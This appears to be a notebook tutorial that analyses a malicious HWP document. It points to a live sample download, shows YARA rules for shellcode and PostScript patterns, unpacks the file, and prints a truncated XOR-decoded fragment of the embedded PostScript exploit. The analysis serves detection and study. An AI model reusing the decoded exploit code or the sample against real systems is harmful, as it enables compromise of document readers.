So let's say you need to analyse malicious hwp files.
We will be using the following example to teach you how.
https://gist.githubusercontent.com/jacobsoo/8676ecd44f7e06c92f7d111406cb0025/raw/ce2b13085bfc5a148b6e3228053fccddd7ed6441/%25EC%2584%25A0%25EC%25A0%2595%25ED%258F%2589%25EA%25B0%2580%2520%25EB%25AC%25B8%25EC%259D%2598%25EB%2582%25B4%25EC%259A%25A9.hwp

**SHA256** : 6d83845271b672c84d9af8ab4527ce79ffcd980aa29f57a9f4e46498439646b6<br>
**ITW filename** : 선정평가 문의내용.hwp<br>
**First Submission** : 2020-05-27 05:14:00<br><br>

Let's download the sample and find it contains exploit codes using the script below.

In [ ]:
!sudo apt-get install automake libtool make gcc pkg-config flex bison
#Install Yara and Lib-Yara
!echo "Install Yara..."
#!git clone --recursive https://github.com/VirusTotal/yara.git && cd yara && git checkout ca3927f && ./bootstrap.sh && sync && ./configure --enable-cuckoo --enable-magic && make && make install 
!git clone --recursive https://github.com/VirusTotal/yara.git && cd yara && ./bootstrap.sh && sync && ./configure && make && sudo make install 
!echo "Install yara-python..."
#!git clone --recursive https://github.com/VirusTotal/yara-python.git && cd yara-python && python setup.py build --dynamic-linking && sudo python setup.py install
!sudo pip install yara-python
!pip install pyhwp

In [ ]:
import requests, os, re, sys, struct
from subprocess import Popen, PIPE
import subprocess
import argparse
import yara
import binascii, zlib
from sys import argv

bExploit = False
bExploit2 = False
bMalCodes = False

#-----------------------------------------------------------
# check_hwp_file : Checks whether it is a valid HWP file
#-----------------------------------------------------------
def check_hwp_file(hwp_file):
    bHWP = False
    szError = "Not an OLE2 Compound Binary File"
    output = None
    try:
        args = ["hwp5proc", "summaryinfo", hwp_file]
        process_hwp5proc = subprocess.Popen(args, stdout=subprocess.PIPE, shell=False)
        out = process_hwp5proc.communicate()
        if szError in out == True or out[0] == '':
            bHWP = False
        else:
            bHWP = True
    except subprocess.CalledProcessError as e:
        bHWP = False
    return bHWP

#-----------------------------------------------------------
# parse_hwp_file : <Description>
#-----------------------------------------------------------
def parse_hwp_file(hwp_file):
    print("[INFO] Inside parse_hwp_file")
    try:
        # The following section will extract important meta data.
        args = ["hwp5proc", "summaryinfo", hwp_file]
        process_hwp5proc = subprocess.Popen(args, stdout=subprocess.PIPE, shell=False)
        out = process_hwp5proc.communicate()[0]
        out = out.decode('utf-8')
        _log("[INFO] Processing %s ... " % hwp_file)
        #found = re.search('PIDSI_TITLE\:(.*?)\n', out, re.DOTALL)
        found = re.search('\nTitle: (.*?)\n', out, re.DOTALL)
        if found:
            title = found.group(1)
        else:
            title = ""
        #found = re.search('PIDSI_AUTHOR\:(.*?)\n', out, re.DOTALL)
        found = re.search('\nAuthor: (.*?)\n', out, re.DOTALL)
        author = found.group(1)
        #found = re.search('PIDSI_LASTAUTHOR\:(.*?)\n', out, re.DOTALL)
        found = re.search('\nLast saved by: (.*?)\n', out, re.DOTALL)
        lastAuthor = found.group(1)
        #found = re.search('PIDSI_REVNUMBER\:(.*?)\n', out, re.DOTALL)
        found = re.search('\nRevision Number: (.*?)\n', out, re.DOTALL)
        revNumber = found.group(1)
        #found = re.search('PIDSI_CREATE_DTM\:(.*?)\n', out, re.DOTALL)
        found = re.search('\nCreated at: (.*?)\n', out, re.DOTALL)
        created = found.group(1)
        #found = re.search('PIDSI_LASTSAVE_DTM\:(.*?)\n', out, re.DOTALL)
        found = re.search('\nLast saved at: (.*?)\n', out, re.DOTALL)
        lastSaved = found.group(1)
        _log("[INFO] Extracted MetaData:")
        _log("    Title : %s" % title)
        _log("    Author : %s" % author)
        _log("    Last Author : %s" % lastAuthor)
        _log("    Revision Number : %s" % revNumber)
        _log("    Date of Creation : %s" % created)
        _log("    Last Saved : %s" % lastSaved)
        UnpackAndChk(hwp_file)
    except IOError as exception:
        _log("[-] IOError : {}".format(exception))
    except subprocess.CalledProcessError as exception:
        _log("[-] CalledProccessError : {}".format(exception))
    except AttributeError as exception:
        _log("[-] Attribute Error : {}".format(exception))

#---------------------------------------------------
# UnpackAndChk : Unpack HWP and checks for shellcode
#---------------------------------------------------
def UnpackAndChk(szFile):
    bRes = False
    try:
        # The following section will unpack hwp files.
        outDir = os.path.basename(szFile) + "--/"
        args2 = ["hwp5proc", "unpack", szFile, outDir]
        process_hwp5proc = subprocess.Popen(args2, stdout=subprocess.PIPE, shell=False)
        out = process_hwp5proc.communicate()[0]
        out = out.decode('utf-8')
        for root, directories, filenames in os.walk(outDir):
            for filename in filenames: 
                szFile = os.path.join(root,filename)
                print("[INFO] Found {}".format(szFile))
                bRes = nopsledCHK(szFile)
                if bRes==False:
                    bRes = MalCodesCHK(szFile)
                    if bRes==False:
                        bRes = ParaTextnopsledCHK(szFile)
                    else:
                        break
                else:
                    break
    except OSError as e:
        pass
    if bRes==True:
        _log("[INFO] This might be a HWP exploit file.")
    else:
        _log("[-] This might not be a HWP exploit file.")
        

#---------------------------------------------------
# MalCodesCHK : Checks for shellcode
#---------------------------------------------------
def MalCodesCHK(szFile):
    global bMalCodes
    rule = yara.compile(source='rule HWP_MalCodes : Suspicious {strings: $malcodes_1 = /readhexstring/ $malcodes_2 = /exch dup/ $malcodes_3 = /exec/ $malcodes_4 = /concatstrings/ $malcodes_5 = /datastring 1024/ $malcodes_6 = /mod get xor put/ $malcodes_7 = /token pop exch pop/ condition: 3 of ($malcodes_*) }')
    with open(szFile, 'r', encoding="utf8", errors='ignore') as content_file:
        content = content_file.read()
    matches = rule.match(data=content)
    if len(matches)==0:
        rule = yara.compile(source='rule HWP_MalCodes2 : Suspicious {strings: $malcodes_1 = / and get xor / $malcodes_2 = / exch put} for / $malcodes_3 = /exec/ condition: 3 of ($malcodes_*) }')
        with open(szFile, 'r', encoding="utf8", errors='ignore') as content_file:
            content = content_file.read()
        matches = rule.match(data=content)
        if len(matches)>0:
            _log("[INFO] Matches HWP_MalCodes2")
    try:
        if "HWP_MalCodes" in matches[0].rule:
            _log("[INFO] Malicious PostScript found in %s" % szFile)
            bMalCodes = True
            _log("  [INFO] Contents of a malicious Script : \n{}".format(content))
    except IndexError:
        pass
    return bMalCodes

#---------------------------------------------------
# nopsledCHK : Checks for shellcode
#---------------------------------------------------
def nopsledCHK(szFile):
    global bExploit
    rule = yara.compile(source='rule HWP_ShellCode : Suspicious {strings: $nopsled_hex1 = {90 90 90 90} $nopsled_hex2 = /90909090/ $malcodes_1 = /lt\{quit\}/ $malcodes_2 = /string pop/ $malcodes_3 = /putinterval/ $malcodes_4 = /string dup/ $malcodes_5 = /load def/ condition: any of ($nopsled_*) and 3 of ($malcodes_*) }')
    with open(szFile, 'r', encoding="utf8", errors='ignore') as content_file:
        content = content_file.read()
    matches = rule.match(data=content)
    try:
        if "HWP_ShellCode" in matches[0].rule:
            _log("[INFO] Shellcode found in %s" % szFile)
            bExploit = True
    except IndexError:
        pass
    return bExploit

#---------------------------------------------------
# ParaTextnopsledCHK : Checks for shellcode
#---------------------------------------------------
def ParaTextnopsledCHK(szFile):
    global bExploit2
    rule2 = yara.compile(source='rule HWP_ParaTextShellCode : Suspicious {strings: $nopsled_hex1 = {90 90 90 90 90} $nopsled_hex2 = /9090909090/ condition: any of ($nopsled_*) }')
    with open(szFile, 'r', encoding="utf8", errors='ignore') as content_file2:
        content2 = content_file2.read()
    matches2 = rule2.match(data=content2)
    try:
        if "HWP_ParaTextShellCode" in matches2[0].rule and "Section" in szFile:
            _log("[INFO] Shellcode found in %s" % szFile)
            bExploit2 = True
    except IndexError:
        pass
    return bExploit2

#---------------------------------------------------
# _log : Prints out logs for debug purposes
#---------------------------------------------------
def _log(s):
    print(s)

def fetch_payload(url):
    r = requests.get(url)
    return r.content

url = 'https://gist.githubusercontent.com/jacobsoo/8676ecd44f7e06c92f7d111406cb0025/raw/ce2b13085bfc5a148b6e3228053fccddd7ed6441/%25EC%2584%25A0%25EC%25A0%2595%25ED%258F%2589%25EA%25B0%2580%2520%25EB%25AC%25B8%25EC%259D%2598%25EB%2582%25B4%25EC%259A%25A9.hwp'
malware_str = fetch_payload(url)
file = open("output.bin","wb")
hb = binascii.a2b_hex(malware_str)
file.write(hb)
file.close()
bRes = check_hwp_file("output.bin")
if bRes:
    print("[INFO] This is a HWP file.")
    parse_hwp_file("output.bin")

[INFO] This is a HWP file.
[INFO] Inside parse_hwp_file
[INFO] Processing output.bin ... 
[INFO] Extracted MetaData:
    Title : 
    Author : (주)한글과컴퓨터
    Last Author : Administrator
    Revision Number : 9, 0, 0, 562 WIN32LEWindows_Unknown_Version
    Date of Creation : 2004-11-09 06:23:46.535000
    Last Saved : 2020-05-27 00:41:56.784000
[INFO] Found output.bin--/_05HwpSummaryInformation
[INFO] Found output.bin--/PrvText
[INFO] Found output.bin--/PrvImage
[INFO] Found output.bin--/DocInfo
[INFO] Found output.bin--/FileHeader
[INFO] Found output.bin--/DocOptions/_LinkDoc
[INFO] Found output.bin--/BodyText/Section1
[INFO] Found output.bin--/BodyText/Section0
[INFO] Found output.bin--/Scripts/JScriptVersion
[INFO] Found output.bin--/Scripts/DefaultJScript
[INFO] Found output.bin--/BinData/BIN0001.PS
[INFO] Matches HWP_MalCodes2
[INFO] Malicious PostScript found in output.bin--/BinData/BIN0001.PS
  [INFO] Contents of a malicious Script : 
/Good <
...>%def ini
 def%tfcvgyuhb
0 1 Good l

We can see that it's doing an XOR function there with the 2 hexadecimal strings. <BR>

So i've made another script below to decode it further.

In [ ]:
import binascii

xorKey = "296bd6eb2ca90321bbef5f5f4cfc10ec"
xorStr = "..."

def DecodeItNow(decrypt_key, data):
    length = len(data)
    m_data = []
    for i in range(length):
        m_index = i % len(decrypt_key)
        m_key = decrypt_key[m_index]
        m_data +=  chr((data[i])^ m_key)
    data = "".join(m_data)
    return data


if __name__ == '__main__':
    m_b = list(binascii.unhexlify(xorKey) )
    m_a = list(binascii.unhexlify(xorStr) )
    print(DecodeItNow(m_b,m_a))

/Y1 16#FFFF def /Y2 Y1 array def /Y3 (poor) def /Y4 1 array def /Y5 0 def /Y6 16#100 def /Y7 Y6 array def /Y8 16#8 def /Y9 16#18F0 def /Y10 16#31E array def /Y11 16#215 array def /Y12 16#1 array def /Y13 { Y10 aload 16#10 { Y11 aload } repeat 16#100 { /Y14 16#1520 string def} repeat 0 1 Y6 1 sub { /Y15 16#1520 string def 0 1 Y15 length 1 sub { Y15 exch 1 put } for Y7 exch Y15 put } for } bind def /Y16 { /Y18 exch def /Y19 Y18 -15 bitshift def /Y21 Y18 16#7FFF and def /Y20 Y2 Y19 get def Y20 Y21 get Y20 Y21 1 add get 8 bitshift or Y20 Y21 2 add get 16 bitshift or Y20 Y21 3 add get 24 bitshift or } bind def /Y17 { /Y22 exch def /Y18 exch def /Y19 Y18 -15 bitshift def /Y21 Y18 16#7FFF and def /Y20 Y2 Y19 get def Y20 Y21 Y22 16#FF and put Y20 Y21 1 add Y22 -8 bitshift 16#FF and put Y20 Y21 2 add Y22 -16 bitshift 16#FF and put Y20 Y21 3 add Y22 -24 bitshift 16#FF and put } bind def /Y23 { /Y24 exch def /Y19 Y24 -15 bitshift def /Y21 Y24 16#7FFF and def /Y20 Y2 Y19 get def Y20 Y21 get Y20 Y2

It is now easier to look at the shellcode.